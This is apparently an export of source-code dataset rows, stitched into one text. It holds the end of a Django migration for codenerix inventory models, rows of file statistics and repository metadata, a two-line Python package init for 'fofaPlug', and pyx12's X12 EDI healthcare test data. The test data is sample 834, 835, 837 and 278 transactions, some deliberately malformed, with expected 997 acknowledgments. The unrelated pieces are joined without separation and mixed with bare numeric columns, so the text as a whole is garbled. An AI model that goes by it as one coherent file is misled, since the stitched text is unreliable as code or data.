('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('end', models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Ends')),
('order', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='inventorys', to='codenerix_invoicing.SalesOrder', verbose_name='Order')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='InventoryOutLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('product_unique_value', models.CharField(blank=True, default=None, editable=False, max_length=80, null=True, verbose_name='Product Unique Value')),
('quantity', models.FloatField(default=1.0, verbose_name='Quantity')),
('box', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_storages.StorageBox', verbose_name='Box')),
('inventory', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inventory_lines', to='codenerix_storages.InventoryOut', verbose_name='Inventory line')),
('operator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_storages.StorageOperator', verbose_name='Storage Operator')),
('product_final', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_products.ProductFinal', verbose_name='Product Final')),
('product_unique', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryoutline', to='codenerix_products.ProductUnique', verbose_name='Product Unique')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.RemoveField(
model_name='inventory',
name='kind',
),
migrations.RemoveField(
model_name='inventory',
name='name',
),
migrations.RemoveField(
model_name='inventory',
name='start',
),
migrations.AlterField(
model_name='inventory',
name='end',
field=models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Ends'),
),
migrations.AlterField(
model_name='inventoryline',
name='box',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_storages.StorageBox', verbose_name='Box'),
),
migrations.AlterField(
model_name='inventoryline',
name='operator',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_storages.StorageOperator', verbose_name='Storage Operator'),
),
migrations.AlterField(
model_name='inventoryline',
name='product_final',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_products.ProductFinal', verbose_name='Product Final'),
),
migrations.AlterField(
model_name='inventoryline',
name='product_unique',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='storage_inventoryline', to='codenerix_products.ProductUnique', verbose_name='Product Unique'),
),
]
| 62.780488 | 233 | 0.646594 | 772 | 7,722 | 6.264249 | 0.145078 | 0.081886 | 0.049214 | 0.077337 | 0.867866 | 0.867866 | 0.824235 | 0.797353 | 0.773987 | 0.773987 | 0 | 0.00809 | 0.215618 | 7,722 | 122 | 234 | 63.295082 | 0.790325 | 0.008806 | 0 | 0.608696 | 1 | 0 | 0.248726 | 0.107568 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026087 | 0 | 0.052174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd5c4f969531a4015905e7b257fb9df09b0d730e | 68 | py | Python | fofaPlug/__init__.py | Yingsame/mysearch | 73c9bdbf850cb839865106c2c71bf302178b1742 | [
"Unlicense"
] | 1 | 2021-08-28T17:54:45.000Z | 2021-08-28T17:54:45.000Z | fofaPlug/__init__.py | Yingsame/mysearch | 73c9bdbf850cb839865106c2c71bf302178b1742 | [
"Unlicense"
] | null | null | null | fofaPlug/__init__.py | Yingsame/mysearch | 73c9bdbf850cb839865106c2c71bf302178b1742 | [
"Unlicense"
] | null | null | null | from fofaPlug import vip_cookies
from fofaPlug import download_Data | 34 | 34 | 0.882353 | 10 | 68 | 5.8 | 0.7 | 0.413793 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 68 | 2 | 34 | 34 | 0.966667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fd62b12d98ee3be879d3247047523549820dd3da | 50,985 | py | Python | pyx12/test/x12testdata.py | arenius/pyx12 | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | [
"BSD-3-Clause"
] | 120 | 2015-01-30T07:17:26.000Z | 2022-03-25T16:42:15.000Z | pyx12/test/x12testdata.py | arenius/pyx12 | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | [
"BSD-3-Clause"
] | 43 | 2015-02-12T18:42:26.000Z | 2021-12-12T22:22:20.000Z | pyx12/test/x12testdata.py | arenius/pyx12 | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | [
"BSD-3-Clause"
] | 85 | 2015-02-12T16:44:28.000Z | 2022-03-24T20:20:46.000Z | datafiles = {
'834_lui_id': {
'source': """ISA*00* *00* *ZZ*D00XXX *ZZ*00AA *070305*1832*U*00401*000701336*0*P*:~
GS*BE*D00XXX*00AA*20070305*1832*13360001*X*004010X095A1~
ST*834*0001~
BGN*00*88880070301 00*20070305*181245****4~
DTP*007*D8*20070301~
N1*P5*PAYER 1*FI*999999999~
N1*IN*KCMHSAS*FI*999999999~
INS*Y*18*030*XN*A*C**FT~
REF*0F*00389999~
REF*1L*000003409999~
REF*3H*K129999A~
DTP*356*D8*20070301~
NM1*IL*1*DOE*JOHN*A***34*999999999~
N3*777 ELM ST~
N4*ALLEGAN*MI*49010**CY*03~
DMG*D8*19670330*M**O~
LUI***ESSPANISH~
HD*030**AK*064703*IND~
DTP*348*D8*20070301~
AMT*P3*45.34~
REF*17*E 1F~
SE*20*0001~
GE*1*13360001~
IEA*1*000701336~
""",
'res997': """ISA*00* *00* *ZZ*00GR *ZZ*D00111 *070320*1721*U*00401*703201721*0*P*:~
GS*FA*00GR*D00111*20070320*172121*13360001*X*004010~
ST*997*0001~
AK1*BE*13360001~
AK2*834*0001~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*13360001~
IEA*1*703201721~
"""},
'835id': {
'res997': """ISA*00* *00* *ZZ*382999999 *ZZ*383319999 *090304*1036*U*00401*903041036*1*P*:~
GS*FA*382999999*383319999*20090304*103618*3444*X*004010~
ST*997*0001~
AK1*HP*3444~
AK2*835*40731~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*3444~
TA1*000003447*090220*1816*A*000~
IEA*1*903041036~
""",
'source': """ISA*00* *00* *ZZ*383319999 *ZZ*382999999 *090220*1816*U*00401*000003447*1*P*:~
GS*HP*383319999*382999999*20090220*1816*3444*X*004010X091A1~
ST*835*40731~
BPR*I*5950.21*C*CHK************20090220~
TRN*1*0004926*1382999999~
DTM*405*20090209~
N1*PR*Payer 1~
N3*123 Elm~
N4*Nowhere*MI*49000~
N1*PE*Provider 1*FI*382999999~
N3*456 Oak~
N4*Nowhere*MI*49000~
LX*1~
CLP*123839-24635*22*-310*-210*0*HM*6363451~
NM1*QC*1*Flintstone*Fred****34*373899999~
AMT*AU*580~
SVC*HC:T1017*-310*-210**6~
DTM*150*20080111~
CAS*CR*45*-100~
REF*G1*20540~
CLP*123839-24635*1*300*200*0*HM*6363451~
NM1*QC*1*Flintstone*Fred****34*373899999~
AMT*AU*590~
SVC*HC:T1017*300*200**6~
DTM*150*20080111~
CAS*CR*45*100~
REF*G1*20540~
CLP*134158-27488*22*-500.25*-500.25*0*HM*6397645~
NM1*QC*1*Rubble*Barney****34*376899999~
AMT*AU*595~
SVC*HC:T1017:TG*-500.25*-500.25**6~
DTM*150*20080402~
REF*G1*20908~
PLB*382999999*20090930*CS*-1008.1*CS*24.21*CS*5.95~
SE*33*40731~
GE*1*3444~
IEA*1*000003447~
"""},
'837miss': {
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *041211*1902*U*00401*412111902*1*T*:~
GS*FA*ZZ001*ZZ000*20041211*190228*17*X*004010~
ST*997*0001~
AK1*HC*17~
AK2*837*11280001~
AK5*R*2~
AK9*R*0*0*0*3~
SE*6*0001~
GE*1*17~
TA1*000010121*030828*1128*R*023~
IEA*1*412111902~
""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*1*T*:~
GS*HC*ZZ000*ZZ001*20030828*1128*17*X*004010X098A1~
ST*837*11280001~"""
},
'mult_isa': {
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *070328*1628*U*00401*703281628*0*T*:~
GS*FA*00GR*D00111*20070328*162824*383880001*X*004010~
ST*997*0001~
AK1*HI*17~
AK2*278*11280001~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280002~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280003~
AK3*HL*2**3~
AK5*R*5~
AK9*R*3*3*0~
SE*13*0001~
ST*997*0002~
AK1*HC*18~
AK2*837*11280001~
AK3*REF*2**3~
AK3*NM1*2**3~
AK3*NM1*2**3~
AK3*HL*2**3~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0002~
ST*997*0003~
AK1*HP*383880001~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0003~
ST*997*0004~
AK1*HP*2~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0004~
ST*997*0005~
AK1*HP*3~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0005~
ST*997*0006~
AK1*HI*17~
AK2*278*11280001~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280002~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280003~
AK3*HL*2**3~
AK5*R*5~
AK9*R*3*3*0~
SE*13*0006~
ST*997*0007~
AK1*HC*18~
AK2*837*11280001~
AK3*REF*2**3~
AK3*NM1*2**3~
AK3*NM1*2**3~
AK3*HL*2**3~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0007~
ST*997*0008~
AK1*HP*383880001~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0008~
GE*8*383880001~
IEA*1*703281628~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010125*0*T*:~
GS*HI*ZZ000*ZZ001*20030828*1128*17*X*004010X094A1~
ST*278*11280001~
BHT*0078*11*121231*20050802*1202~
SE*3*11280001~
ST*278*11280002~
BHT*0078*13*121231*20050802*1202~
SE*3*11280002~
ST*278*11280003~
BHT*0078*11*121231*20050802*1202~
SE*3*11280003~
GE*3*17~
GS*HC*ZZ000*ZZ001*20030828*1128*18*X*004010X098A1~
ST*837*11280001~
BHT*0019*00*121231*20050802*1202*CH~
SE*3*11280001~
GE*1*18~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*383880001~
GS*HP*D00111*00GR*20041028*1609*2*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*2~
GS*HP*D00111*00GR*20041028*1609*3*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*3~
IEA*5*000010125~
ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*0*T*:~
GS*HI*ZZ000*ZZ001*20030828*1128*17*X*004010X094A1~
ST*278*11280001~
BHT*0078*11*121231*20050802*1202~
SE*3*11280001~
ST*278*11280002~
BHT*0078*13*121231*20050802*1202~
SE*3*11280002~
ST*278*11280003~
BHT*0078*11*121231*20050802*1202~
SE*3*11280003~
GE*3*17~
GS*HC*ZZ000*ZZ001*20030828*1128*18*X*004010X098A1~
ST*837*11280001~
BHT*0019*00*121231*20050802*1202*CH~
SE*3*11280001~
GE*1*18~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*383880001~
IEA*3*000010121~"""
},
'trailer_errors':
{
'res997': """ISA*00* *00* *ZZ*ENCOUNTER *ZZ*00HP *041206*1224*U*00401*412061224*0*P*:~
GS*FA*ENCOUNTER*00HP*20041206*122452*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300207436~
AK5*R*4~
AK2*837*300207437~
AK5*A~
AK9*R*2*2*1*4~
SE*8*0001~
GE*1*1~
TA1*000484950*040820*1133*R*018~
IEA*1*412061224~""",
'source': """ISA*00* *00* *ZZ*00HP *ZZ*ENCOUNTER *040820*1133*U*00401*000484950*1*P*:~
GS*HC*00HP*ENCOUNTER*20040820*1133*1*X*004010X096A1~
ST*837*300207436~
BHT*0019*00*300207436*20040820*1133*RP~
REF*87*004010X096A1~
NM1*41*2*SENDER 1*****46*00HP~
PER*IC*CONTACT 1*TE*8005557487~
NM1*40*2*RECEIVER 1*****46*D00111~
HL*1**20*1~
NM1*85*2*BILLING PROVIDER 1*****24*445556666~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
REF*1D*1708146~
HL*2*1*22*0~
SBR*S*18*******MC~
NM1*IL*1*MANN*MICHAEL****MI*11331122~
N3*123 ELM STRET~
N4*BURR OAK*MI*49030~
DMG*D8*19950801*M~
REF*SY*363121212~
NM1*PR*2*MDCH*****PI*D00111~
N3*PO BOX 4321~
N4*LANSING*MI*48909~
CLM*1309590*0***11:A:1*Y*A*Y*A*********N~
DTP*434*RD8*20040618-20040623~
DTP*435*DT*200406180800~
CL1*9*9*09~
CN1*05~
HI*BK:31389*BJ:31389~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*ST JOSEPH COUNTY CMH~
PRV*RP*ZZ*101Y00000X~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
SBR*P*18**KALAMAZOO CMH*****MC~
AMT*B6*632.5000~
DMG*D8*19950801*M~
OI***Y***I~
NM1*IL*1*MANN*MICHAEL****MI*00000006632~
N3*123 ELM STRET~
N4*BURR OAK*MI*49030~
NM1*PR*2*KALAMAZOO CMH*****PI*174456543~
DTP*573*D8*20040816~
REF*F8*1309590~
SBR*T*18**SENDER 1 HEALTH*****MC~
AMT*B6*632.5000~
DMG*D8*19950801*M~
OI***Y***I~
NM1*IL*1*MANN*MICHAEL****MI*00000006632~
N3*123 ELM STRET~
N4*BURR OAK*MI*49030~
NM1*PR*2*SENDER 1*****PI*174454370~
REF*F8*1309590~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20040618-20040623~
SVD*174456543*0**0100*5~
DTP*573*D8*20040816~
SE*60*300207436~
ST*837*300207437~
BHT*0019*00*300207437*20040820*1133*RP~
REF*87*004010X096A1~
NM1*41*2*SENDER 1*****46*00HP~
PER*IC*CONTACT 1*TE*8005557487~
NM1*40*2*RECEIVER 1*****46*D00111~
HL*1**20*1~
NM1*85*2*BILLING PROVIDER 1*****24*445556666~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
REF*1D*1708146~
HL*2*1*22*0~
SBR*S*18*******MC~
NM1*IL*1*WAHL*JAMES****MI*12341234~
N3*MT PLEASANT CENTER*1400 W MAIN~
N4*MT. PLEASANT*MI*48858~
DMG*D8*19750704*M~
REF*SY*374121234~
NM1*PR*2*MDCH*****PI*D00111~
N3*PO BOX 4321~
N4*LANSING*MI*48909~
CLM*1304171*0***11:A:1*Y*A*Y*A*********N~
DTP*434*RD8*20040601-20040701~
DTP*435*DT*200406010800~
CL1*9*9*09~
CN1*05~
HI*BK:31234*BJ:31234~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*ST JOSEPH COUNTY CMH~
PRV*RP*ZZ*101Y00000X~
N3*456 MAIN STREET~
N4*THREE RIVERS*MI*49093~
SBR*P*18**KALAMAZOO CMH*****MC~
AMT*B6*216.7000~
DMG*D8*19750704*M~
OI***Y***I~
NM1*IL*1*WAHL*JAMES****MI*00000000043~
N3*MT PLEASANT CENTER*1400 W MAIN~
N4*MT. PLEASANT*MI*48858~
NM1*PR*2*KALAMAZOO CMH*****PI*174456543~
DTP*573*D8*20040719~
REF*F8*1304171~
SBR*T*18**SENDER 1 HEALTH*****MC~
AMT*B6*216.7000~
DMG*D8*19750704*M~
OI***Y***I~
NM1*IL*1*WAHL*JAMES****MI*00000000043~
N3*MT PLEASANT CENTER*1400 W MAIN~
N4*MT. PLEASANT*MI*48858~
NM1*PR*2*SENDER 1*****PI*174454370~
REF*F8*1304171~
LX*1~
SV2*0100**0*UN*30*0*0~
DTP*472*RD8*20040601-20040701~
SVD*174456543*0**0100*30~
DTP*573*D8*20040719~
SE*59*300207437~
GE*2*333~
IEA*5*333~"""
},
'trailing_terms': {
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *070319*1742*U*00401*703191742*0*P*:~
GS*FA*0BBB*0AAA*20070319*174249*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK3*CLM*22**8~
AK4*18*1073*1~
AK5*R*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*1~
IEA*1*703191742~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A********~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SE*38*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'bad_2010AA_bug': {
'res997': """ISA*00* *00* *ZZ*RECEIVER *ZZ*SENDER *040701*1620*U*00401*407011620*0*P*:~
GS*FA*RECEIVER*SENDER*20040701*162046*56*X*004010~
ST*997*0001~
AK1*HC*56~
AK2*837*000000001~
AK3*NM1*8**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0001~
GE*1*56~
IEA*1*407011620~""",
'source': """ISA*03*SENDER *01* *ZZ*SENDER *ZZ*RECEIVER *040608*1333*U*00401*000000288*0*P*:~
GS*HC*SENDER*RECEIVER*20040608*1333*56*X*004010X098A1~
ST*837*000000001~
BHT*0019*00*289*20040608*1333*CH~
REF*87*004010X098A1~
NM1*41*2*SENDER 1*****46*2309-0923~
PER*IC*Contact Name*TE*1115551111~
NM1*40*2*Payer*****46*21312311~
HL*1**20*1~
HL*2*1*22*0~
SBR*P*18*******11~
NM1*IL*1*GAIMAN*NEIL*M***MI*101911111~
N3*1123 OAKLAND~
N4*VOID*MI*49001~
DMG*D8*19460101*M~
REF*SY*370600001~
NM1*PR*2*PAYER 1*****PI*44-4444444~
N3*4444 ONE RD~
N4*VOID*MI*49001~
CLM*6643-1019AA*14.84***12::1*Y*A*N*Y*B~
HI*BK:29590~
LX*1~
SV1*HC:H2015*14.84*UN*6***1~
DTP*472*D8*20040501~
REF*6R*AKLKJ124231AD~
SE*24*000000001~
GE*1*56~
IEA*1*000000288~"""
},
'elements': {
'res997': """ISA*00* *00* *ZZ*RECEIVER *ZZ*SENDER *070320*0942*U*00401*703200942*0*P*:~
GS*FA*RECEIVER*SENDER*20070320*094249*56*X*004010~
ST*997*0001~
AK1*HC*56~
AK2*837*000000001~
AK3*REF*3**8~
AK4*2*127*7*004010X098A2~
AK3*PER*5**8~
AK4*3*365*7*TA~
AK3*NM1*7**8~
AK4*8*66*7*47~
AK3*NM1*15**8~
AK4*8*66*5*MIM~
AK4*8*66*7*MIM~
AK3*DMG*18**8~
AK4*2*1251*8*19461301~
AK4*3*1068*7*R~
AK3*CLM*23**8~
AK4*5:1*1331*7*95~
AK5*R*4*5~
AK9*R*1*1*0~
SE*20*0001~
GE*1*56~
IEA*1*703200942~""",
'source': """ISA*03*SENDER *01* *ZZ*SENDER *ZZ*RECEIVER *040608*1333*U*00401*000000288*0*P*:~
GS*HC*SENDER*RECEIVER*20040608*1333*56*X*004010X098A1~
ST*837*000000001~
BHT*0019*00*289*20040608*1333*CH~
REF*87*004010X098A2~
NM1*41*2*SENDER 1*****46*2309-0923~
PER*IC*Contact Name*TA*111-555-1111~
PER*IC*Contact Name*TE*111-555-1111~
NM1*40*2*Payer*****47*21312311~
HL*1**20*1~
NM1*85*2*Biller 1*****XX*2309-2222~
N3*1123 MILL~
N4*VOID*MI*49002~
PER*IC*Contact Name*TE*111-555-2222~
HL*2*1*22*0~
SBR*P*18*******11~
NM1*IL*1*GAIMAN*NEIL*MMMM***MIM*101911111~
N3*1123 OAKLAND~
N4*VOID*MI*49001~
DMG*D8*19461301*R~
REF*SY*370600000~
NM1*PR*2*PAYER 1*****PI*44-4444444~
N3*4444 ONE RD~
N4*VOID*MI*49001~
CLM*6643-1019AA*999.6***95::8*Y*A*N*Y*B~
HI*BK:29590~
LX*1~
SV1*HC:H2015*14.84*UN*6***1~
DTP*472*D8*20040501~
REF*6R*AKLKJ124231AD~
SE*30*000000001~
GE*1*56~
IEA*1*000000288~"""
},
'bad_header_looping': {
'res997': """ISA*00* *00* *ZZ*00AA *ZZ*D00000 *070405*0014*U*00401*704050014*0*P*:~
GS*FA*00GR*D00111*20070405*001406*383880001*X*004010~
ST*997*0001~
AK1*HP*383880001~
AK2*835*0001~
AK3*DTM*5**8~
AK4*2*373*8*11111111~
AK3*N1*39**1~
AK3*N3*40**1~
AK3*N4*41**1~
AK3*N1*42**1~
AK5*R*4*5~
AK9*R*1*1*0~
SE*12*0001~
GE*1*383880001~
IEA*1*704050014~""",
'source': """ISA*00* *00* *ZZ*D00000 *ZZ*00AA *041028*1609*U*00401*000238388*0*P*:~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
BPR*H*0*C*NON************20041028~
TRN*1*000000000*1386000134~
REF*EV*00GR~
DTM*405*11111111~
N1*PR*PAYER~
N3*P.O. BOX 30479~
N4*LANSING*MI*48909~
N1*PE*UNKNOWN*FI*444313000~
LX*1~
TS3*653423424*12*20041231*1*915.39~
CLP*2005555A*4*915.39*0**MC*4276512332~
NM1*QC*1*BACH*JOHANN*S***MR*00001612~
NM1*82*2*PAYEE*****MC*44452736~
SVC*HC:T1005*500.04*0**68~
DTM*150*20031129~
DTM*151*20031129~
CAS*CO*16*500.04~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*127.8*0**16~
DTM*150*20031030~
DTM*151*20031030~
CAS*OA*A7*127.8~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*287.55*0**36~
DTM*150*20031031~
DTM*151*20031031~
CAS*OA*A7*287.55~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
N1*PR*PAYER~
N3*P.O. BOX 30479~
N4*LANSING*MI*48909~
N1*PE*UNKNOWN*FI*444313000~
LX*1~
TS3*653423424*12*20041231*1*915.39~
CLP*2005555A*4*915.39*0**MC*4276512332~
NM1*QC*1*BACH*JOHANN*S***MR*00001612~
NM1*82*2*PAYEE*****MC*44452736~
SVC*HC:T1005*500.04*0**68~
DTM*150*20031129~
DTM*151*20031129~
CAS*CO*16*500.04~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*127.8*0**16~
DTM*150*20031030~
DTM*151*20031030~
CAS*OA*A7*127.8~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SVC*HC:T1005*287.55*0**36~
DTM*150*20031031~
DTM*151*20031031~
CAS*OA*A7*287.55~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
LQ*HE*N14~
SE*39*0001~
GE*1*383880001~
IEA*1*000238388~"""
},
'blank1': {
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *050721*1643*U*00401*507211643*0*P*:~
GS*FA*0BBB*0AAA*20050721*164347*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK3*SV2*57**8~
AK4*2:1*235*7* ~
AK4*2:2*234*1~
AK3*SVD*59**8~
AK4*3:1*235*7* ~
AK4*3:2*234*1~
AK5*R*5~
AK9*R*1*1*0~
SE*12*0001~
GE*1*1~
IEA*1*507211643~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0100* :*0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0* :*0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*63*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'ele':
{
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *041214*1129*U*00401*412141129*1*P*:~
GS*FA*0BBB*0AAA*20041214*112925*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK5*R*3*7~
AK9*R*1*1*0*1~
SE*6*0001~
GE*1*1~
TA1*000484889*040709*3339*R*015~
IEA*1*412141129~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*3339*U*00401*000484889*1*P*:~
GS*HC*0AAA *0BBB *20040709*1439*1*X*004010X096A1~
ST*837*300145997 ~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
